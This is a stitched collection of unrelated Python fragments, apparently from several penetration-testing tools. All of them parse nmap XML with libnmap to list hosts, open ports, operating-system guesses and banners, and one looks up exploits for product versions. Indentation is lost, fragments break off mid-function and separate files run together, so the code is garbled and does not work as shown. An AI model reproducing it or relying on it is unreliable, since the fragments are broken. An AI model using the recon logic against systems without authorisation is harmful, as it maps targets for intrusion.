hsummary = "Nmap Scan discovered {0}/{1} hosts up".format(
nmap_report.hosts_up, nmap_report.hosts_total)
final_data = {}
for _host in nmap_report.hosts: # Loop through all the hosts in XML
if _host.is_up(): # Check to filter only up hosts
# print("\n" + "Host: {0} {1}".format(_host.address, " ".join(_host.hostnames)))
ports = {}
for s in _host.services: # Loop through all the Ports, Services and State of the current host
if s.state == 'open': # Check to filter only open ports.
current_port = {
s.port: {
"protocol": s.protocol,
"service": s.service,
"state": s.state
}
}
ports.update(current_port)
h_data = {_host.address: ports}
final_data.update(h_data)
print_scan(nmap_report)
return final_data
def run_cmd(command_name,
populated_command,
celery_path,
task_id,
path=None,
process_domain_tuple=None,
process_nmap=None,
output_file=None):
"""
:param command_name:
:param populated_command:
:param celery_path:
:param task_id:
:param path:
:param process_domain_tuple:
:return:
"""
#task_id = run_cmd.request.id
#task_id = run_cmd.request.id
# Without the sleep, some jobs were showing as submitted even though
# they were started. Not sure why.
#time.sleep(3)
audit_log = celery_path + "/log/cmdExecutionAudit.log"
f = open(audit_log, 'a')
start_time = time.time()
start_time_int = int(start_time)
start_ctime = time.ctime(start_time)
start = timer()
#f.write("[+] CMD EXECUTED: " + str(start_ctime) + " - " + populated_command + "\n")
#f.write(task_id)
print(populated_command)
#The except isnt working yet if I kill the process from linux cli. i guess that is not enough to trigger an exception.
try:
p = Popen(populated_command, shell=True, stdout=PIPE, stdin=PIPE)
pid = p.pid + 1
db.update_task_status_started("STARTED", task_id, pid, start_time_int)
out, err = p.communicate()
end = timer()
end_ctime = time.ctime(end)
run_time = end - start
db.update_task_status_completed("COMPLETED", task_id, run_time)
#f.write("\n[-] CMD COMPLETED in " + str(run_time) + " - " + populated_command + "\n")
f.write("\n" + str(start_ctime) + "\t" + str(end_ctime) + "\t" +
str("{:.2f}".format(run_time)) + "\t" + command_name + "\t" +
populated_command)
except:
end = timer()
run_time = end - start
db.update_task_status_error("FAILED", task_id, run_time)
f.close()
if process_domain_tuple:
lib.scan.determine_if_domains_are_in_scope(out, process_domain_tuple)
else:
#putting this here because i want to parse scan tool output for urls, not subdomain tools output
parsers.generic_urlextract.extract_in_scope_urls_from_task_output(out)
if process_nmap:
nmap_xml = output_file + ".xml"
nmap_report = NmapParser.parse_fromfile(nmap_xml)
workspace = lib.db.get_current_workspace()[0][0]
lib.csimport.process_nmap_data(nmap_report, workspace)
return out
def validate_nmap(file):
NmapParser.parse_fromfile(os.getcwd() + file)
def read_hosts_from_file(nmapxmlfile):
'''
Reads from a provided nmap XML file and returns an NmapReport object
'''
logger.info('Reading hosts from file: ' + str(nmapxmlfile))
return NmapParser.parse_fromfile(nmapxmlfile)
def details(request, filename):
if os.path.getsize('scannerlogs/' + filename) == 0:
error = "error"
context = {'error': error}
return render(request, 'scanner/details.html', context)
if "nmap" in filename:
try:
rep = NmapParser.parse_fromfile('scannerlogs/' + filename)
list_host = []
list_ip = []
counter = []
service = []
state = []
port = []
banner = []
osname = []
count = 0
counter.append(count)
for host in rep.hosts:
hostname = ', '.join(host.hostnames)
ip = host.address
list_host.append(hostname)
list_ip.append(ip)
list_os = []
if host.os.osmatches:
for osmatch in host.os.osmatches:
osguess = osmatch.name + ' ---- ' + str(
osmatch.accuracy) + '%'
list_os.append(osguess)
else:
list_os.append("None")
list_service = []
list_state = []
list_port = []
list_banner = []
for i in host.services:
list_service.append(i.service)
list_state.append(i.state)
list_port.append(i.port)
if i.banner:
list_banner.append(i.banner)
else:
list_banner.append("None")
service.append(list_service)
state.append(list_state)
port.append(list_port)
banner.append(list_banner)
osname.append(list_os)
count += 1
counter.append(count)
foo = zip(list_host, list_ip, osname, service, state, port, banner,
counter)
two = zip(service, state, port)
type = "nmap"
context = {'type': type, 'lists': foo, 'list': two}
return render(request, 'scanner/details.html', context)
except Exception as e:
wrong = 'wrong'
serverip = SSHCred.objects.filter(servertype='scanning')
scanhistory = sorted_ls(os.getcwd() + '/scannerlogs')
list_timestamp = gettimestamp(scanhistory)
context = {
'serverip': serverip,
'list_timestamp': list_timestamp,
'wrong': wrong
}
return render(request, 'scanner/networkscanner.html', context)
else:
try:
rep = NmapParser.parse_fromfile('scannerlogs/' + filename)
results = {}
iplist = []
iplist2 = []
for host in rep.hosts:
ip = host.address
for i in host.services:
port = i.port
if ip in results:
ports = results[ip]
ports.append(port)
else:
ports = [port]
if list:
ports.sort()
results[ip] = ports
iplist.append(ip)
for i in iplist:
if i not in iplist2:
iplist2.append(i)
request.session['listofip'] = iplist2
unique = []
for key, value in results.items():
for i in value:
if i not in unique:
unique.append(i)
value = ', '.join(str(e) for e in value)
results[key] = value
request.session['listofports'] = unique
serverip = SSHCred.objects.filter(servertype='scanning')
type = "masscan"
api_keys = ApiKey.objects.filter(type__type_name='Shodan')
context = {
'results': results,
'serverip': serverip,
'type': type,
'apikey': api_keys
}
return render(request, 'scanner/details.html', context)
except Exception as e:
wrong = 'wrong'
serverip = SSHCred.objects.filter(servertype='scanning')
scanhistory = sorted_ls(os.getcwd() + '/scannerlogs')
list_timestamp = gettimestamp(scanhistory)
context = {
'serverip': serverip,
'list_timestamp': list_timestamp,
'wrong': wrong
}
return render(request, 'scanner/networkscanner.html', context)
def logparser(ip, protocol):
from xml.etree import ElementTree
from libnmap.parser import NmapParser
with open('./results/{0}/{0}{1}_nmap_scan_import.xml'.format(ip, protocol),
'rt') as file: #ElementTree module is opening the XML file
tree = ElementTree.parse(file)
rep = NmapParser.parse_fromfile(
'./results/{0}/{0}{1}_nmap_scan_import.xml'.format(
ip, protocol)) #NmapParse module is opening the XML file
#For loop used by NmapParser to print the hostname and the IP
for _host in rep.hosts:
host = ', '.join(_host.hostnames)
ip = (_host.address)
print "\033[1;32m[+]\033[1;37m HostName: " '{0: >35}\033[1;m'.format(
host, "--", ip)
#Lists in order to store Additional information, Product and version next to the port information.
list_product = []
list_version = []
list_extrainf = []
for node_4 in tree.iter(
'service'
): #ElementTree manipulation. Service Element which included the sub-elements product, version, extrainfo
product = node_4.attrib.get('product')
version = node_4.attrib.get('version')
extrainf = node_4.attrib.get('extrainfo')
list_product.append(product)
list_version.append(version)
list_extrainf.append(extrainf)
try:
for osmatch in _host.os.osmatches: #NmapParser manipulation to detect OS and accuracy of detection.
os = osmatch.name
accuracy = osmatch.accuracy
print "\033[1;32m[+]\033[1;37m Operating System Guess: \033[1;m", os, "\033[1;37m- Accuracy Detection\033[1;m", accuracy
break
except:
os = "Microsoft"
print "\033[1;32m[+]\033[1;37m ----------------------------------------------------------------------------- \033[1;m"
try:
if protocol == 'UDP':
os = 'UDP'
if 'Microsoft' in os:
counter = 0
for services in _host.services: #NmapParser manipulation to list services, their ports and their state. The list elements defined above are printed next to each line.
#print "Port: "'{0: <5}'.format(services.port), "Product: "'{0: <15}'.format(list_product[counter],list_version[counter],list_extrainf[counter]), "State: "'{0: <5}'.format(services.state), "Protocol: "'{0: <5}'.format(services.protocol)
print "\033[1;32m[+]\033[1;37m Port: " '{0: <5}\033[1;m'.format(
services.port
), "\033[1;37mState: " '{0: <5}\033[1;m'.format(
services.state
), "\033[1;37mProtocol: " '{0: <2}\033[1;m'.format(
services.protocol
), "\033[1;37mProduct: " '{0: <15}\033[1;m'.format(
list_product[counter]
), "\033[1;37mVersion: " '{0: <15}\033[1;m'.format(
list_version[counter]
), "\033[1;37mExtrInfo: " '{0: <10}\033[1;m'.format(
list_extrainf[counter])
findsploit(list_product[counter], list_version[counter])
counter = counter + 1
if 'Linux' in os:
counter = 0
for services in _host.services: #NmapParser manipulation to list services, their ports and their state. The list elements defined above are printed next to each line.
#print "Port: "'{0: <5}'.format(services.port), "Product: "'{0: <15}'.format(list_product[counter],list_version[counter],list_extrainf[counter]), "State: "'{0: <5}'.format(services.state), "Protocol: "'{0: <5}'.format(services.protocol)
print "\033[1;32m[+]\033[1;37m Port: " '{0: <5}\033[1;m'.format(
services.port
), "\033[1;37mState: " '{0: <5}\033[1;m'.format(
services.state
), "\033[1;37mProtocol: " '{0: <2}\033[1;m'.format(
services.protocol
), "\033[1;37mProduct: " '{0: <15}\033[1;m'.format(
list_product[counter]
), "\033[1;37mVersion: " '{0: <15}\033[1;m'.format(
list_version[counter]
), "\033[1;37mExtrInfo: " '{0: <10}\033[1;m'.format(
list_extrainf[counter])
findsploit(list_product[counter], list_version[counter])
counter = counter + 1
if 'UDP' in os:
counter = 0
for services in _host.services: #NmapParser manipulation to list services, their ports and their state. The list elements defined above are printed next to each line.
#print "Port: "'{0: <5}'.format(services.port), "Product: "'{0: <15}'.format(list_product[counter],list_version[counter],list_extrainf[counter]), "State: "'{0: <5}'.format(services.state), "Protocol: "'{0: <5}'.format(services.protocol)
print "\033[1;32m[+]\033[1;37m Port: " '{0: <5}\033[1;m'.format(
services.port
), "\033[1;37mState: " '{0: <15}\033[1;m'.format(
services.state
), "\033[1;37mProtocol: " '{0: <2}\033[1;m'.format(
services.protocol
), "\033[1;37mProduct: " '{0: <15}\033[1;m'.format(
list_product[counter]
), "\033[1;37mVersion: " '{0: <10}\033[1;m'.format(
list_version[counter]
), "\033[1;37mExtrInfo: " '{0: <10}\033[1;m'.format(
list_extrainf[counter])
findsploit(list_product[counter], list_version[counter])
counter = counter + 1
except:
print(
'\033[1;31m[-] NMAP parsing script {0} had some errors or no ports were found.\033[1;m'
.format(ip))
parser.add_argument("-ap", "--allports", action="store_true",
help="add ports closed or filtered")
parser.add_argument("-a", "--all", action="store_true",
help="same as '-ah -ap'")
parser.add_argument("folder",
help="folder where nmap outputs are stored")
args = parser.parse_args()
path=args.folder+"/"
uid=1
root = ET.Element("cherrytree")
for filename in os.listdir(path):
if not filename.endswith('.xml'): continue
try:
rep = NmapParser.parse_fromfile(path+filename)
except:
continue
node = ET.SubElement(root, "node", custom_icon_id="0", foreground="", is_bold="False", name=filename.split(".")[0], prog_lang="custom-colors", readonly="False", tags="", unique_id=str(uid))
uid=uid+1
try:
with open(path+filename.split(".")[0]+".nmap") as f: s = f.read()
ET.SubElement(node, "rich_text").text=s
except EnvironmentError:
print "Nmap file not found it won't be added"
for _host in rep.hosts:
if (_host.is_up() and len(_host.services)>0) or args.allhosts or args.all:
host = ET.SubElement(node, "node", foreground="", is_bold="False", name=_host.address, prog_lang="custom-colors", readonly="False", tags="", unique_id=str(uid))
def main():
args = parse_args()
report = NmapParser.parse_fromfile(args.nmapxml)
report_parser(report)
# Get all file names from the screenshots folder to search later.
all_screenshot_files = [
f for f in os.listdir(path + "screenshots/")
if os.path.isfile(path + "screenshots/" + f)
]
all_tool_output_files = []
# Get all file names from the other tool output folders to search later.
#for tool_folder in os.listdir(path):
# if tool_folder <> "nmap" and tool_folder <> screenshot:
# all_tool_output_files += os.listdir(path+tool_folder+"/")
# Read all nmap files and write into tree object.
for filename in os.listdir(nmap_folder):
if not filename.endswith('.xml'): continue
try:
rep = NmapParser.parse_fromfile(nmap_folder + filename)
except:
continue
for _host in rep.hosts:
if (_host.is_up()
and len(_host.services) > 0) or args.allhosts or args.all:
# If a node already exits for the host, use it, otherwise create one.
try:
host = node.findall('./node[@name="' + _host.address + '"]')[0]
except:
host = ET.SubElement(node,
"node",
foreground="",
is_bold="False",
exit()
# now we need targets, either from file or xml
targets = set()
if args.targets:
if not os.path.isfile(args.targets):
error("Targets file '%s' does not exist!" % args.targets)
exit()
if not os.access(args.targets, os.R_OK):
error("Targets file '%s' is not readable!" % args.targets)
exit()
with open(args.targets) as f:
targets = [line.rstrip('\n') for line in f]
elif args.files:
for xml in args.files:
parsed = NmapParser.parse_fromfile(xml)
for host in parsed.hosts:
if args.up and args.ports:
if host.is_up() and len(host.get_open_ports()) > 0:
targets.add(host.address)
elif args.up:
if host.is_up():
targets.add(host.address)
elif args.ports:
if len(host.get_open_ports()) > 0:
targets.add(host.address)
else:
targets.add(host.address)
else:
error("Targets needed!")
parser.print_help()
#output = sorted(set(countlist))
#print "Count: " + str(len(countlist))
#print output[:-1]
def printsortedlistnewlineswithcountall(list):
output = ""
#list = sorted(set(list)) makes them unique
list = sorted(list)
for l in list:
output += str(l) + "," + str(list.count(l)) + "\n"
print "Count: " + str(len(list))
print output[:-1]
nmap_report = NmapParser.parse_fromfile(sys.argv[1])
#print "Nmap scan summary: {0}".format(nmap_report.summary)
openports = []
opentcp = []
openudp = []
openhosts = []
#trying to get
#PORT PROTOCOL SERVICE VERSION
#443 tcp ssl/http
openportprotoserviceversion = []
hostPort = []
servicePort = []
servicePortNoBanner = []
servicePortCount = []
'IP Address', 'Port/Protocol', 'Domains', 'Operating System',
'OS Version', 'Notes'
]
writer = csv.DictWriter(csvwrite,
fieldnames=fieldnames,
dialect=csv.excel,
quoting=csv.QUOTE_ALL)
# write CSV header
writer.writeheader()
# iterate through xml(s)
for xml_report in nmap_xml_reports:
try:
# trying to load xml file
nmap_report = NmapParser.parse_fromfile(xml_report)
logger.info("%s host(s) loaded from %s" %
(len(nmap_report.hosts), xml_report))
except Exception, e:
logger.warn("XML file %s corrupted or format not recognized" %
xml_report)
# keep looking for others xml
continue
# start a cumulative dictionary
results = nmap_combine(nmap_report, results)
#print "results: %s" % len(results)
logger.info("Wraping up results")
for ip_address in results:
# colecting info for each field
def main():
newrep = NmapParser.parse_fromfile(
'libnmap/test/files/2_hosts_achange.xml')
oldrep = NmapParser.parse_fromfile('libnmap/test/files/1_hosts.xml')
print_diff(newrep, oldrep)
cursor = conn.cursor()
debug("Start ",
"Successfully connected to SQLite DB \"%s\"" % (args.scandb))
cursor.execute("SELECT name FROM sqlite_master WHERE type='table';")
if (u'hosts', ) not in cursor.fetchall():
debug('Start ', 'Database does not exist. Creating...Done')
try:
cursor.executescript(sql_struct())
except sqlite.ProgrammingError, msg:
err("Start ", "%s: error: %s\n" % (argv[0], msg))
sys.exit(1)
else:
debug('Start ', 'Database already exists. Continuing.')
try:
nmap_report = NmapParser.parse_fromfile(args.nmap_xml)
debug("Parser", "Nmap Results: {0}".format(nmap_report.summary))
except IOError:
err("Parser",
" %s: error: file \"%s\" doesn't exist" % (argv[0], args.nmap_xml))
sys.exit(-1)
except:
err(
"Parser", " %s: error: file \"%s\" Issue parsing Nmap XML" %
(argv[0], args.nmap_xml))
sys.exit(-1)
for host in nmap_report.hosts:
ip = host.address
mac = host.mac
if not host.ipv6:
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from libnmap.parser import NmapParser
rep1 = NmapParser.parse_fromfile('libnmap/test/files/1_hosts.xml')
rep2 = NmapParser.parse_fromfile('libnmap/test/files/1_hosts_diff.xml')
rep1_items_changed = rep1.diff(rep2).changed()
changed_host_id = rep1_items_changed.pop().split('::')[1]
changed_host1 = rep1.get_host_byid(changed_host_id)
changed_host2 = rep2.get_host_byid(changed_host_id)
host1_items_changed = changed_host1.diff(changed_host2).changed()
changed_service_id = host1_items_changed.pop().split('::')[1]
changed_service1 = changed_host1.get_service_byid(changed_service_id)
changed_service2 = changed_host2.get_service_byid(changed_service_id)
service1_items_changed = changed_service1.diff(changed_service2).changed()
for diff_attr in service1_items_changed:
print("diff({0}, {1}) [{2}:{3}] [{4}:{5}]".format(
changed_service1.id, changed_service2.id, diff_attr,
getattr(changed_service1, diff_attr), diff_attr,
getattr(changed_service2, diff_attr)))
nmapResults = sys.argv[1]
csvFileName = sys.argv[1].split(".")[0] + ".csv"
print(csvFileName)
#Create a dictionary with CIDR and environment name as key:value pair
if len(sys.argv) > 2:
with open(sys.argv[2]) as f:
targets = dict(x.rstrip().split(":", 1) for x in f)
#CSV file that we'll write to
csvfile = open(csvFileName, 'w')
csvwriter = csv.writer(csvfile, dialect=csv.excel, quotechar='|', quoting=csv.QUOTE_MINIMAL)
#create variable to store parsed XML report in
nmap_report=NmapParser.parse_fromfile(nmapResults, data_type='XML')
#Write header row in CSV output
if len(sys.argv) > 2:
csvwriter.writerow(['IPv4', 'Hostname', 'Subnet', 'Environment', 'Port', 'State', 'Protocol', 'Service', 'Reason', 'Banner'])
else:
csvwriter.writerow(['IPv4', 'Hostname', 'Port', 'State', 'Protocol', 'Service', 'Reason', 'Banner'])
for scanned_host in nmap_report.hosts:
if scanned_host.is_up:
ipv4 = scanned_host.ipv4
#ipv6 = scanned_host.ipv6
if len(sys.argv) > 2:
for key in targets.keys():
if IPAddress(ipv4) in IPNetwork(key):
subnet = str(key)
def parse(self, xml): """ import an nmap xml output """ report = NmapParser.parse_fromfile(xml) for host in report.hosts: # get os accuracy try: accuracy = str(host.os_class_probabilities()[0]) except: accuracy = "" # get the os match try: match = str(host.os_match_probabilities()[0]) except: match = "" # get the first hostname try: hostname = host.hostnames[0] except: hostname = "" # check if the host is already in the db if self.database.host_exist(host.address): # update add_host = self.database.session.query(targets).filter( targets.address == host.address ).one() # update values only if there's more informations if len(str(host.scripts_results)) > 3: add_host.scripts = str(host.scripts_results) if len(hostname) > 0: if not hostname in add_host.hostname: # add multiple hostnames add_host.hostname = add_host.hostname + hostname + " " if len(match) > 0: add_host.os_match = match if len(accuracy) >0: add_host.os_accuracy = accuracy if len(host.ipv4) > 0: add_host.ipv4 = host.ipv4 if len(host.ipv6) > 0: add_host.ipv6 = host.ipv6 if len(host.mac) > 0: add_host.mac = host.mac if len(host.status) > 0: add_host.status = host.status if len(host.tcpsequence) > 0: add_host.tcpsequence = host.tcpsequence if len(host.vendor) > 0: add_host.vendor = host.vendor if len(str(host.uptime)) > 0: add_host.uptime = host.uptime if len(str(host.lastboot)) > 0: add_host.lastboot = host.lastboot if len(str(host.distance)) > 0: add_host.distance = host.distance else: # add the host to the db add_host = targets(address=host.address,scripts=str(host.scripts_results), hostname=hostname, os_match=match, os_accuracy=accuracy, ipv4=host.ipv4, ipv6=host.ipv6, mac=host.mac, status=host.status, tcpsequence=host.tcpsequence, vendor=host.vendor, uptime=host.uptime, lastboot=host.lastboot, distance=host.distance) # commit to db self.database.session.add(add_host) self.database.session.commit() for port in host.get_ports(): service = host.get_service(port[0],port[1]) if self.database.port_exist(add_host.id, port[0], port[1]): # update the existing port add_port = self.database.session.query(services).filter( services.host_id == add_host.id, services.port == port[0], services.protocol == port[1] ).one() if len(service.service) > 0: add_port.service = service.service if len(service.servicefp) > 0: add_port.fingerprint = str(service.servicefp) #print(service.servicefp) if len(service.state) > 0: add_port.state = service.state if len(service.banner) > 0: #print(service.banner) nb = re.sub(r'[A-z]+?:\s','', service.banner) add_port.banner = nb else: # add the new port add_port = services(port=port[0], protocol=port[1], service=service.service, fingerprint=service.servicefp, state=service.state, banner=service.banner, host = add_host) # commit to db self.database.session.add(add_port) self.database.session.commit()
args = parser.parse_args()
ptdb = PenTestDBConn()
path = base64.b64decode(args.path)
try:
files = os.listdir(path)
except FileNotFoundError as e:
print('Path does not exist: {0}'.format(path))
os.chdir(path)
for file in files:
if file.decode('utf-8') == 'archive':
continue
nmap_report = NmapParser.parse_fromfile(file.decode('utf-8'))
for scanned_host in nmap_report.hosts:
address = scanned_host.address # ip address
mac = scanned_host.mac # mac address
if scanned_host.os_fingerprinted:
host_os = scanned_host.os.osmatches[0].name
else:
host_os = None
# TODO: check if host already exists and we just need to update it
host_id = ptdb.insert_host_record(address, mac, host_os)
ports = scanned_host.get_ports()
for port in ports:
port_num = port[0]
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser()
parser.add_argument("-o",
"--output",
metavar="XLS",
help="path to xlsx output")
parser.add_argument("reports",
metavar="XML",
nargs="+",
help="path to nmap xml report")
args = parser.parse_args()
if args.output == None:
parser.error("Output must be specified")
reports = []
for report in args.reports:
try:
parsed = NmapParser.parse_fromfile(report)
except NmapParserException as ex:
parsed = NmapParser.parse_fromfile(report, incomplete=True)
parsed.basename = os.path.basename(report)
reports.append(parsed)
workbook = Workbook(args.output)
main(reports, workbook)
from libnmap.parser import NmapParser
from libnmap.reportjson import ReportDecoder, ReportEncoder
import json
nmap_report_obj = NmapParser.parse_fromfile('/root/dev/python-nmap-lib/libnmap/test/files/1_hosts.xml')
# create a json object from an NmapReport instance
nmap_report_json = json.dumps(nmap_report_obj, cls=ReportEncoder)
print nmap_report_json
# create a NmapReport instance from a json object
nmap_report_obj = json.loads(nmap_report_json, cls=ReportDecoder)
print nmap_report_obj
def test_osclasses_new(self):
oclines = [[[{
'type': 'general purpose',
'accuracy': 100,
'vendor': 'Apple',
'osfamily': 'Mac OS X',
'osgen': '10.8.X'
}, {
'type': 'phone',
'accuracy': 100,
'vendor': 'Apple',
'osfamily': 'iOS',
'osgen': '5.X'
}, {
'type': 'media device',
'accuracy': 100,
'vendor': 'Apple',
'osfamily': 'iOS',
'osgen': '5.X'
}]],
[[{
'type': 'general purpose',
'accuracy': 100,
'vendor': 'Microsoft',
'osfamily': 'Windows',
'osgen': '2008'
}],
[{
'type': 'general purpose',
'accuracy': 100,
'vendor': 'Microsoft',
'osfamily': 'Windows',
'osgen': '7'
}],
[{
'type': 'phone',
'accuracy': 100,
'vendor': 'Microsoft',
'osfamily': 'Windows',
'osgen': 'Phone'
}],
[{
'type': 'general purpose',
'accuracy': 100,
'vendor': 'Microsoft',
'osfamily': 'Windows',
'osgen': 'Vista'
}, {
'type': 'general purpose',
'accuracy': 100,
'vendor': 'Microsoft',
'osfamily': 'Windows',
'osgen': '2008'
}, {
'type': 'general purpose',
'accuracy': 100,
'vendor': 'Microsoft',
'osfamily': 'Windows',
'osgen': '7'
}],
[{
'type': 'general purpose',
'accuracy': 100,
'vendor': 'Microsoft',
'osfamily': 'Windows',
'osgen': 'Vista'
}, {
'type': 'general purpose',
'accuracy': 100,
'vendor': 'Microsoft',
'osfamily': 'Windows',
'osgen': '7'
}, {
'type': 'general purpose',
'accuracy': 100,
'vendor': 'Microsoft',
'osfamily': 'Windows',
'osgen': '2008'
}]]]
rep = NmapParser.parse_fromfile(self.flist_os['nv6']['file'])
hlist = []
hlist.append(rep.hosts.pop())
hlist.append(rep.hosts.pop())
i = 0
j = 0
k = 0
for h in hlist:
for om in h.os.osmatches:
for oc in om.osclasses:
tdict = {
'type': oc.type,
'accuracy': oc.accuracy,
'vendor': oc.vendor,
'osfamily': oc.osfamily,
'osgen': oc.osgen
}
self.assertEqual(oclines[i][j][k], tdict)
k += 1
j += 1
k = 0
j = 0
i += 1
def allOpenPorts(self):
"""The openPorts function will parse all found ports from the FullTcpNmap.xml file fed to
the report variable. All ports will be appended to the lists in __init__ and will
then be accessible from the NmapParserFunk Class."""
def parsefile(xmlfile):
parser = make_parser()
parser.setContentHandler(ContentHandler())
parser.parse(xmlfile)
c = config_parser.CommandParser(
f"{os.path.expanduser('~')}/.config/autorecon/config.yaml",
self.target)
if os.path.exists(c.getPath("nmap", "nmap_full_tcp_xml")):
try:
parsefile(c.getPath("nmap", "nmap_full_tcp_xml"))
report = NmapParser.parse_fromfile(
c.getPath("nmap", "nmap_full_tcp_xml"))
self.nmap_services += report.hosts[0].services
self.nmap_services = sorted(self.nmap_services,
key=lambda s: s.port)
# print(self.nmap_services)
ignored_windows_http_ports = [593, 5985, 47001, 49669, 49670]
for service in self.nmap_services:
if "open" not in service.state:
continue
if "open|filtered" in service.state:
continue
self.services.append((
service.port,
service.service,
service.tunnel,
service.cpelist,
service.banner,
service.service_dict.get("product", ""),
service.service_dict.get("version", ""),
service.service_dict.get("extrainfo", ""),
service.scripts_results,
))
for service in self.services:
if service[0] not in self.tcp_ports:
self.tcp_ports.append(service[0])
if "ssl" in service[2] or ("ssl" in service[1]):
if "imap" not in service[1]:
if "pop3" not in service[1]:
if "ldap" not in service[1]:
if service[0] not in self.ssl_ports:
self.ssl_ports.append(service[0])
if service[
8] not in self.ssl_script_results:
self.ssl_script_results.append(
service[8])
if "http" in service[1] and (
"ssl/http" not in service[1]) and (
"ssl"
not in service[2]) and ("ssl"
not in service[1]):
if "MiniServ" not in service[5]:
if "http-proxy" not in service[1]:
if service[
0] not in ignored_windows_http_ports:
if service[0] not in self.http_ports:
self.http_ports.append(service[0])
if service[
8] not in self.http_script_results:
self.http_script_results.append(
service[8])
if "netbios-ssn" in service[1]:
if service[0] not in self.smb_ports:
self.smb_ports.append(service[0])
if "microsoft-ds" in service[1]:
if service[0] not in self.smb_ports:
self.smb_ports.append(service[0])
if "domain" in service[1]:
if service[0] not in self.dns_ports:
self.dns_ports.append(service[0])
if "http-proxy" in service[1]:
if service[0] not in self.proxy_ports:
self.proxy_ports.append(service[0])
if "ssh" in service[1]:
if service[0] not in self.ssh_ports:
self.ssh_ports.append(service[0])
if service[5] not in self.ssh_product:
self.ssh_product.append(service[5])
if service[6] not in self.ssh_version:
self.ssh_version.append(service[6])
if service[8] not in self.ssh_script_results:
self.ssh_script_results.append(service[8])
if "oracle-tns" in service[1]:
if service[0] != 49160:
if service[0] not in self.oracle_tns_ports:
self.oracle_tns_ports.append(service[0])
if "ftp" in service[1]:
if service[0] not in self.ftp_ports:
self.ftp_ports.append(service[0])
if service[5] not in self.ftp_product:
self.ftp_product.append(service[5])
if service[6] not in self.ftp_version:
self.ftp_version.append(service[6])
if "smtp" in service[1]:
if service[0] not in self.smtp_ports:
self.smtp_ports.append(service[0])
if service[4] not in self.smtp_version:
self.smtp_version.append(service[4])
if service[5] not in self.smtp_product:
self.smtp_product.append(service[5])
if "rpcbind" in service[1]:
if service[0] not in self.nfs_ports:
self.nfs_ports.append(service[0])
if "msrpc" in service[1]:
if service[0] not in self.rpc_ports:
self.rpc_ports.append(service[0])
if "ldap" in service[1]:
if service[0] not in self.ldap_ports:
self.ldap_ports.append(service[0])
if "BaseHTTPServer" in service[4]:
if service[0] not in self.http_ports:
self.http_ports.append(service[0])
if "Apache" in service[5] and (
"ssl/http" not in service[1]) and (
"ssl"
not in service[2]) and ("ssl"
not in service[1]):
if service[0] not in self.http_ports:
self.http_ports.append(service[0])
if "telnet" in service[1]:
if service[0] not in self.telnet_ports:
self.telnet_ports.append(service[0])
if "asterisk" in service[1]:
if service[0] not in self.sip_ports:
self.sip_ports.append(service[0])
if "vnc" in service[1]:
if service[0] not in self.vnc_ports:
self.vnc_ports.append(service[0])
if "cassandra" in service[1]:
if service[0] not in self.cassandra_ports:
self.cassandra_ports.append(service[0])
if "ms-sql" in service[1]:
if service[0] not in self.mssql_ports:
self.mssql_ports.append(service[0])
if "mysql" in service[1]:
if service[0] not in self.mysql_ports:
self.mysql_ports.append(service[0])
if "finger" in service[1]:
if service[0] not in self.finger_ports:
self.finger_ports.append(service[0])
if "mongod" in service[1]:
if service[0] not in self.mongo_ports:
self.mongo_ports.append(service[0])
if "pop3" in service[1]:
if service[0] not in self.pop3_ports:
self.pop3_ports.append(service[0])
if "kerberos" in service[1]:
if service[0] not in self.kerberos_ports:
self.kerberos_ports.append(service[0])
if "kpasswd" in service[1]:
if service[0] not in self.kerberos_ports:
self.kerberos_ports.append(service[0])
if service[4] not in self.banners:
self.banners.append(service[4])
if service[5] not in self.all_products:
self.all_products.append(service[5])
if len(self.http_script_results) != 0:
for t in self.http_script_results[0]:
result = t["id"], t["output"]
if "http-title" in result:
if result[1] not in self.http_script_title:
self.http_script_title.append(result[1])
except Exception as e:
print(
f"""{c.getPath("nmap", "nmap_full_tcp_xml")} Cannot Parse Full TCP nmap xml file. {e}"""
)
return
def test_osmatches_new(self):
rep = NmapParser.parse_fromfile(self.flist_os["nv6"]["file"])
hlist = []
hlist.append(rep.hosts.pop())
hlist.append(rep.hosts.pop())
baseline = [
[{
"line":
6014,
"accuracy":
100,
"name":
"Apple Mac OS X 10.8 - 10.8.1 (Mountain Lion) (Darwin 12.0.0 - 12.1.0) or iOS 5.0.1",
}],
[
{
"line": 52037,
"accuracy": 100,
"name": "Microsoft Windows Server 2008 Beta 3",
},
{
"line": 52938,
"accuracy": 100,
"name": "Microsoft Windows 7 Professional",
},
{
"line": 54362,
"accuracy": 100,
"name": "Microsoft Windows Phone 7.5",
},
{
"line":
54897,
"accuracy":
100,
"name":
"Microsoft Windows Vista SP0 or SP1, Windows Server 2008 SP1, or Windows 7",
},
{
"line":
55210,
"accuracy":
100,
"name":
"Microsoft Windows Vista SP2, Windows 7 SP1, or Windows Server 2008",
},
],
]
i = 0
j = 0
for h in hlist:
for om in h.os.osmatches:
tdict = {
"line": om.line,
"accuracy": om.accuracy,
"name": om.name,
}
self.assertEqual(baseline[i][j], tdict)
j += 1
j = 0
i += 1
def openProxyPorts(self):
"""The openProxyPorts function will parse all found ports from the proxychains nmap xml file fed to
the report variable. All ports will be appended to the lists in __init__ and will
then be accessible from the NmapParserFunk Class."""
def parsefile(xmlfile):
parser = make_parser()
parser.setContentHandler(ContentHandler())
parser.parse(xmlfile)
c = config_parser.CommandParser(
f"{os.path.expanduser('~')}/.config/autorecon/config.yaml",
self.target)
if os.path.exists(c.getPath("nmap", "nmap_proxychain_top_ports")):
try:
parsefile(c.getPath("nmap", "nmap_proxychain_top_ports"))
proxy_report = NmapParser.parse_fromfile(
c.getPath("nmap", "nmap_proxychain_top_ports"))
self.proxy_nmap_services += proxy_report.hosts[0].services
self.proxy_nmap_services = sorted(self.proxy_nmap_services,
key=lambda s: s.port)
ignored_windows_http_ports = [593, 5985, 47001, 49669, 49670]
for service in self.proxy_nmap_services:
if "open" not in service.state:
continue
self.proxy_services.append((
service.port,
service.service,
service.tunnel,
service.cpelist,
service.banner,
))
for service in self.proxy_services:
if service[0] not in self.proxy_tcp_ports:
self.proxy_tcp_ports.append(service[0])
if "ssl" in service[2] or ("ssl" in service[1]):
if "imap" not in service[1]:
if "pop3" not in service[1]:
if "ldap" not in service[1]:
if service[
0] not in self.proxy_ssl_ports:
self.proxy_ssl_ports.append(
service[0])
if "http" in service[1]:
if "ssl" not in service[2]:
if "ssl" not in service[1]:
if "http-proxy" not in service[1]:
if service[
0] not in ignored_windows_http_ports:
if service[
0] not in self.proxy_http_ports:
self.proxy_http_ports.append(
service[0])
